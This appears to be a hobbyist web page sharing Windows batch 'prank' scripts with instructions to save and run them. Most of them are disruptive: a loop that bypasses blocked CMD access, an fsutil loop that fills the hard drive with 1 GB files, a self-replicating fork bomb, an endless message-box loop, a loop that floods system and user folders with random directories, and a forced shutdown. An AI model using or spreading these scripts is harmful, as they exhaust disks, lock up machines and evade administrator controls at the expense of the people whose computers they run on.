So, are you here for dank CMD code? Well, you are in the right place. First, what you need to know...
First, save as file type All Files (as shown below)

Next, save it as whatever you want, as long as the name ends with .bat

Ta Da! Oh yeah, so what you want to open is Notepad. Copy and paste in the code and save as .bat. Then run it! (or don't, depending on what the code is...)
First off, we have the legendary CMD workaround. So, cmd is blocked? Simply use this code!
@echo off
:loop
set /p command=%cd%^>
%command%
goto loop
Now, we have a script for fun. It will cause your screen to flash random colors at you! (YAY!!)
@echo off
:1
set /a rand1=%random% %% 16
set /a rand2=%random% %% 16
set HEX=0123456789ABCDEF
call set hexcolors=%%HEX:~%rand1%,1%%%%HEX:~%rand2%,1%%
color %hexcolors%
goto 1
Create a HUGE amount of 1 gigabyte empty text files! Fill up your hard drive in SECONDS!!
:1
fsutil file createnew %random%.txt 1000000000
goto 1
I am not even going to tell you what this one does other than this: it will not harm your data, just you will have to shutdown your computer to make it stop ;)
@echo off
set name=%0
set clone=1
:start
:clone
If not exist clone%clone%.bat (
copy "%name%" "clone%clone%.bat"
) else (
set /a clone=%clone%+1
GoTo clone
)
start %name%
start clone%clone%.bat
GoTo start
pause
Have you ever wanted to achieve absolute power over your system settings? This creates a folder called "Special Folders" that has a bunch of administrator settings in it. I have never shared this code before. Ever.
mkdir "Special Folders
cd ".\Special Folders
mkdir "God Mode.{ED7BA470-8E54-465E-825C-99712043E01C}
mkdir "Location Settings.{00C6D95F-329C-409a-81D7-C46C66EA7F33}
mkdir "Biometric Settings.{0142e4d0-fb7a-11dc-ba4a-000ffe7ab428}
mkdir "Power Settings.{025A5937-A6BE-4686-A844-36FE4BEC8B6D}
mkdir "Icons And Notifications.{05d7b0f4-2121-4eff-bf6b-ed3f69b894d9}
mkdir "Credentials and Logins.{1206F5F1-0569-412C-8FEC-3204630DFB70}
mkdir "Programs and Features.{15eae92e-f17a-4431-9f28-805e482dafd4}
mkdir "Default Programs.{17cd9488-1228-4b2f-88ce-4298e93e0966}
mkdir "All NET Frameworks and COM Libraries.{1D2680C9-0E2A-469d-B787-065558BC7D43}
mkdir "All Networks For Current Connection.{1FA9085F-25A2-489B-85D4-86326EEDCD87}
mkdir "Network.{208D2C60-3AEA-1069-A2D7-08002B30309D}
mkdir "My Computer.{20D04FE0-3AEA-1069-A2D8-08002B30309D}
mkdir "Printers.{2227A280-3AEA-1069-A2DE-08002B30309D}
mkdir "Application Connections.{241D7C96-F8BF-4F85-B01F-E2B043341A4B}
mkdir "Firewall and Security.{4026492F-2F69-46B8-B9BF-5654FC07E423}
mkdir "Performance.{78F3955E-3B90-4184-BD14-5397C15F1EFC}
BECOME THE MATRIX:
@echo off
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%.
color 1
color 2
color 3
color 4
color 5
color 6
color 7
color 8
color 9
color a
color b
color c
color d
color e
color f
goto start
This one creates a message box that you can never close... (in theory... heh... It works until they spam the button like crazy while the cmd window has been closed.)
@echo off
:1
msg * "Hello there! I am a virus, and I don't want to leave!"
goto 1
This one is just plain evil. It creates random empty folders everywhere.
@echo off
:loop
md %random%
md c:\%random%
md %systemroot%\%random
md %userprofile%\%random
md %userprofile%\Documents\%random%
md %userprofile%\Music\%random%
md %userprofile%\Desktop\%random%
md %userprofile%\Videos\%random%
md %userprofile%\Pictures\%random%
goto loop
This one just shutdowns your pc (i is not know how to grammar helps)
shutdown.exe -s -t 200 -c "uh oh windows XP is taking over WOAH".
Copyright TTM.co
Sorry that this is all for now guys, I guess I am kinda crazy... Also stressed, but mostly crazy.
I will upload new code at least once a week. Please support me, everyone! Share this website with your friends! Its time the world knew the codes!
Also, feel free to combine and add twists to our codes, as well as share your own code! Just send us your code below!